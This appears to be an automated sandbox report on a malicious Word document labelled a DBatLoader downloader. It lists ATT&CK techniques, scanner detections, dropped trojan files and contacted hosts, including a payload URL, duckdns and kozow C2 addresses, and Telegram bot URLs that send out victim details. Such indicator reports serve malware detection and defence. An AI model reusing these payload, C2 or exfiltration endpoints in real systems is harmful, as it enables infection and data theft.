DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	221 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Valid Accounts	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	41 Virtualization/Sandbox Evasion	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	311 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PI ITS15235 (2).doc	60%	Virustotal		Browse
PI ITS15235 (2).doc	58%	ReversingLabs	Document-Word.Downloader.DBatLoader
PI ITS15235 (2).doc	100%	Avira	W97M/Agent.5915124
PI ITS15235 (2).doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\Nsltarpn.PIF	100%	Avira	HEUR/AGEN.1325914
C:\Windows\SysWOW64\brightness.exe	100%	Avira	HEUR/AGEN.1325914
C:\Windows \SysWOW64\NETUTILS.dll	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Nsltarpn.PIF	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Libraries\npratlsN.pif	3%	ReversingLabs
C:\Windows \SysWOW64\NETUTILS.dll	61%	ReversingLabs	Win64.Trojan.Barys
C:\Windows \SysWOW64\svchost.pif	0%	ReversingLabs
C:\Windows\SysWOW64\brightness.exe	45%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://amazonenviro.com:443/admin/245_Nsltarpncon	100%	Avira URL Cloud	malware
https://amazonenviro.com/admin/245_Nsltarpncon	100%	Avira URL Cloud	malware
https://amazonenviro.com/admin/245_Nsltarpncon_56	0%	Avira URL Cloud	safe
http://e6.o.lencr.org0	0%	Avira URL Cloud	safe
https://amazonenviro.com/	0%	Avira URL Cloud	safe
http://mail.irco.com.sa	0%	Avira URL Cloud	safe
https://amazonenviro.com/admin/2	0%	Avira URL Cloud	safe
https://amazonenviro.com/admin/245_NsltarpnconC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.80.1	true	false	high
amazonenviro.com	166.62.27.188	true	false	high
api.telegram.org	149.154.167.220	true	false	high
mail.irco.com.sa	46.151.208.21	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://amazonenviro.com/admin/245_Nsltarpncon	true	Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:19:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
http://checkip.dyndns.org/	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2016:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/P	npratlsN.pif, 0000000F.00000002.3853601584.000000002DA5C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enDz	npratlsN.pif, 00000011.00000002.3850452895.0000000028580000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amazonenviro.com:443/admin/245_Nsltarpncon	brightness.exe, 00000007.00000002.2244059195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	npratlsN.pif, 00000011.00000002.3850452895.0000000028580000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000285B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928544719.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928544719.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://amazonenviro.com/admin/245_Nsltarpncon_56	brightness.exe, 00000007.00000002.2244059195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://amazonenviro.com/admin/2	brightness.exe, 00000007.00000002.2273645981.000000002056D000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://e6.o.lencr.org0	npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928519346.00000000307A8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3865103101.0000000030778000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998676188.000000002B3D0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com0	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2241546337.0000000021D71000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2277598255.0000000021E1B000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2277009105.0000000021800000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2242163340.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216601555.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 00000010.00000002.2482451684.0000000020595000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.7.dr	false		high
https://reallyfreegeoip.org/xml/	npratlsN.pif, 0000000D.00000002.3852283482.000000001CBC1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D931000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028452000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.office.com/	npratlsN.pif, 00000011.00000002.3850452895.00000000285B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amazonenviro.com/admin/245_NsltarpnconC	brightness.exe, 00000007.00000002.2244059195.000000000069F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enlBsq	npratlsN.pif, 0000000D.00000002.3852283482.000000001CCB5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amazonenviro.com/	brightness.exe, 00000007.00000002.2244059195.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.irco.com.sa	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
